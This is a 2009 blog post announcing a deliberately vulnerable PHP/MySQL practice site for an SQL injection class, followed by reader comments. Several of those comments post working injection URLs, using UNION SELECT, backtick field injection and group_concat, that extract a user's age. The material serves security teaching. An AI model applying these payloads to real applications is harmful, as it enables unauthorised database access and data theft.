Main menu:

Site search

Archives

RSS Arjen's Friendfeed

RSS Richard's del.icio.us links

RSS Maurits' Stumbled Items

Teach me SQL injection

Today I’ve given a SQL injection class at the VU University in Amsterdam. I’ve created a website that is vulnerable to SQL injection and I wanted to share this demo/assignment with you. Note that I’ve turned off magic_quotes_gpc to make life a little easier. The assignment is to find out my age. Whenever somebody has deleted the records in the database you can reset it. One hint: it runs on a PHP5/MySQL5 environment.

Application: http://server.maussoft.com/~sqlinject/list.php

Reset DB: http://server.maussoft.com/~sqlinject/reset.php

Can you hack this application? Try to do it without looking at the source code. Prove it and post an URL in the comments that injects SQL in such a way that the application shows my age. For the pro’s: try to do the same on safe1_view.php, safe2_view.php and insert.html/insert.php. If you can do the same on safe3_view.php or safe4_view.php you are officially 1337 in my book…

Maurits

Posted: April 14th, 2009 under Uncategorized.
Comments: 12

Comments

Comment from Nahuel
Time: April 20, 2009, 3:29

http://server.maussoft.com/~sqlinject/view.php?id=10%20union%20Select%20age,age,age,age%20FROM%20users%20WHERE%20id%20=%20%271%27–

http://server.maussoft.com/~sqlinject/safe1_view.php?id=10%27%20union%20Select%20age,age,age,age%20FROM%20users%20WHERE%20id%20=%20%271

And then I started to suck :(

Comment from maurits
Time: April 20, 2009, 9:55

@Nahuel: Congratulations on the first two! Hint: you can use the “Firebug”, “Tamper Data” and the “Web Developer Toolbar” addons on Firefox to help you with the others.

Comment from Simon
Time: May 12, 2009, 22:09

Third is also easy:

http://server.maussoft.com/~sqlinject/safe2_view.php?field=age&value=…test several values here

Not to hard when you know the result is an integer in range ~ 17-70.

No idea for the last two, though.

Comment from Alex Turpin
Time: June 15, 2009, 21:36

http://server.maussoft.com/~sqlinject/view.php?id=1%20AND%20age=??

Trial and error ftw.

Comment from maurits
Time: June 15, 2009, 21:50

@alex: Well done!! Now that it got you interested, how about the tougher ones?

Comment from dmitri
Time: July 1, 2009, 19:37

These are very easy.

for safe2_view.php:
http://server.maussoft.com/~sqlinject/safe2_view.php?field=id%60%20=%20-1%20UNION%20SELECT%20age,%20age,%20age,age%20from%20users%20WHERE%20%60id&value=1

will pull the age if you get the right ID which I’m presently too lazy to do.

Comment from genny
Time: May 10, 2010, 12:13

http://server.maussoft.com/~sqlinject/view.php?id=1%20union%20select%20%281%29,%28select%20age%20from%20users%20where%20id=1%29,%28select%20last_name%20from%20users%20where%20id=1%29,%281%29%20%20%20%20order%20by%20age%20

Comment from genny
Time: May 10, 2010, 17:25

http://server.maussoft.com/~sqlinject/safe1_view.php?id=12%27%20union%20select%20true,age,true,age%20from%20users%20where%20id%3C%3E%270

Comment from genny
Time: May 10, 2010, 17:58

i readed souce code 4 this:(
http://server.maussoft.com/~sqlinject/safe2_view.php?field=id%60=0%20union%20select%20%281%29,%28age%29,%28first_name%29,%284%29%20from%20users%20order%20by%20%60id

Pingback from Teach me SQL Injection « Andrew Sellick
Time: June 1, 2010, 15:41

[…] If your knowledge is slightly light within the realms of SQL Injection this site could come in very handy: http://www.codingspace.org/2009/04/teach-me-sql-injection/ […]

Comment from Xtazy
Time: July 27, 2010, 23:23

Will this count for the first easy level
Still learning :S
http://server.maussoft.com/~sqlinject/view.php?id=-1+union+all+select+1,group_concat%28age%29,3,4+from%20users/**/

Comment from Heni
Time: July 28, 2010, 10:11

Nothing to see

Write a comment